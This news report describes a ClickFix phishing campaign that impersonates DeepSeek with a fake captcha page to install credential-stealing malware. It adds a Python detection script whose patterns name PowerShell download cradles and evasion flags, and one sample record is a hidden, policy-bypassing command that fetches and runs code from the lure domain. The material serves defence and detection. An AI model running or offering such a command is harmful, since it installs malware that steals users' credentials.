Bengaluru: CloudSEK’s Threat Intelligence Team has identified a dangerous ClickFix phishing campaign that exploits DeepSeek’s brand name to deceive users and install credential-stealing malware.
How the DeepSeek ClickFix Scam Works
Cybercriminals have used a deceptive domain, deepseekcaptcha[.]top, designed to impersonate a DeepSeek verification page. This fake site tricks users into clicking a fraudulent captcha verification button, which, once activated, executes a PowerShell command that installs Vidar Stealer and Lumma Stealer malware. These malicious programs extract sensitive information such as login credentials, financial data, and session tokens, with a particular focus on Steam and Telegram accounts. To evade detection by AI-powered security systems, the attackers have utilized Cloudflare hosting, allowing the malicious domain to remain undetected and active for an extended duration.
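The report describes the mechanics only as far as a fake captcha button leading to a PowerShell command. As an added example (not CloudSEK's code), here is a small detection routine a defender could run over process-creation telemetry: it parses a constructed tab-separated record format, flags PowerShell started from an interactive parent when the command line combines a download cradle with an evasion flag, and separately matches the lure domain named in the report. The record format, the parent-process list and the sample records are assumptions.

```python
import re
from typing import NamedTuple
KNOWN_LURE_DOMAINS = {"deepseekcaptcha.top"}       # from the report, refanged for matching
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}  # assumption: Run-dialog or console launches
# Traits of a paste-and-run PowerShell one-liner: hidden window, policy bypass, encoded payload, download cradle.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
}

class ProcessEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str

def parse_event(line: str) -> ProcessEvent:
    """Parse one tab-separated 'Key=Value' process-creation record (constructed format)."""
    f = dict(kv.split("=", 1) for kv in line.rstrip("\n").split("\t"))
    return ProcessEvent(f["ParentImage"], f["Image"], f["CommandLine"])

def traits_of(ev: ProcessEvent) -> set[str]:
    """Suspicious traits of a PowerShell launch; empty set for any other image."""
    base = lambda p: p.rsplit("\\", 1)[-1].lower()  # file name of a Windows image path
    if base(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return set()
    found = {name for name, rx in TRAITS.items() if rx.search(ev.command_line)}
    if base(ev.parent_image) in INTERACTIVE_PARENTS:
        found.add("interactive_parent")
    if any(d in ev.command_line.lower() for d in KNOWN_LURE_DOMAINS):
        found.add("known_lure_domain")
    return found

def is_clickfix_like(ev: ProcessEvent) -> bool:
    """Known lure domain, or user-launched PowerShell running remote content with an evasion flag."""
    t = traits_of(ev)
    return "known_lure_domain" in t or ({"interactive_parent", "download_cradle"} <= t
                                         and bool(t & {"hidden_window", "exec_bypass", "encoded_command"}))

def scan(lines: list[str]) -> list[tuple[str, set[str]]]:
    """Return (command line, traits) for every record that should alert."""
    return [(e.command_line, traits_of(e)) for e in map(parse_event, lines) if is_clickfix_like(e)]
# Constructed sample records: a plain console launch, a scheduled encoded script, a ClickFix-style lure.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    f"ParentImage=C:\\Windows\\explorer.exe\tImage={PS}\tCommandLine=powershell.exe",
    f"ParentImage=C:\\Windows\\System32\\svchost.exe\tImage={PS}\tCommandLine=powershell -NoProfile -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA=",
    f"ParentImage=C:\\Windows\\explorer.exe\tImage={PS}\tCommandLine=powershell -w hidden -ep bypass -c \"iex (iwr https://deepseekcaptcha.top/verify).Content\"",
]
```

Only the third sample record alerts; the plain console launch and the scheduled encoded script, which lack an interactive parent or a cradle, do not.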
The Growing Threat
The DeepSeek ClickFix scam is part of a growing cybercrime trend where attackers exploit the rapid adoption of AI to manipulate user trust in technology. According to CloudSEK researchers, AI-driven scams are becoming increasingly sophisticated and targeted, allowing them to evade traditional security measures. By leveraging fake verification pages, social media integration, and Cloudflare masking techniques, cybercriminals make these attacks more difficult to detect and mitigate.
According to CloudSEK’s Threat Intelligence Lead, Sparsh Kulshrestha, “The DeepSeek ClickFix scam is a stark reminder of how cybercriminals continuously adapt to exploit emerging technologies. AI users must be extra vigilant when engaging with online verification requests.”
How to Stay Safe – CloudSEK’s Recommendations
In order to safeguard systems from sophisticated phishing attacks, CloudSEK recommends the following best practices:
- Double-Check Website URLs – Always verify if a website is legitimate before entering credentials.
- Beware of Fake Captcha Pages – AI platforms do not require repeated captchas. If prompted, proceed with caution.
- Enable Multi-Factor Authentication (MFA) – Even if credentials are stolen, MFA can prevent unauthorized access.
- Use Advanced Anti-Phishing Protection – Organizations should deploy email filtering solutions and domain monitoring tools to detect phishing sites early.
- Regularly Update Software – Ensure that your device and security software are up to date to prevent vulnerabilities.